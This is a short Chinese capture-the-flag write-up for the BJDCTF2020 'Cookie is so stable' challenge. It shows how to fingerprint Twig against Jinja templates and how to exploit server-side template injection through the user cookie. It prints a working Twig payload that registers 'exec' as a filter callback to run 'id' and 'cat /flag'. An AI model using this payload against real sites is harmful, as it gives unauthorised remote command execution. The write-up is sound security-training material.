[BJDCTF2020]Cookie is so stable

• 试题环境:https://buuoj.cn/challenges#[BJDCTF2020]Cookie is so stable

这是一道模板注入题，流程图（网上搜的）：

1. 首先我们打开页面源码：发现有flag.php和hint.php

2. 然后访问这两个页面看看

   flag.php:

hint.php:

首先在flag.php这个页面测试：测试结果是Twig

Twig
{{4*'5'}}       //输出结果20
Jinja
{{4*'5'}}       //输出结果5555

因为hint.php的源码有提示：

​ 然后我们登录进去抓包，发现user是注入点：

直接用SSTI注入（这篇文章）的payload打：

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

//id 改成 cat /flag

最后得到flag！！！

标签：php,hint,flag,Cookie,stable,so,BJDCTF2020
来源： https://www.cnblogs.com/tzf1/p/14990084.html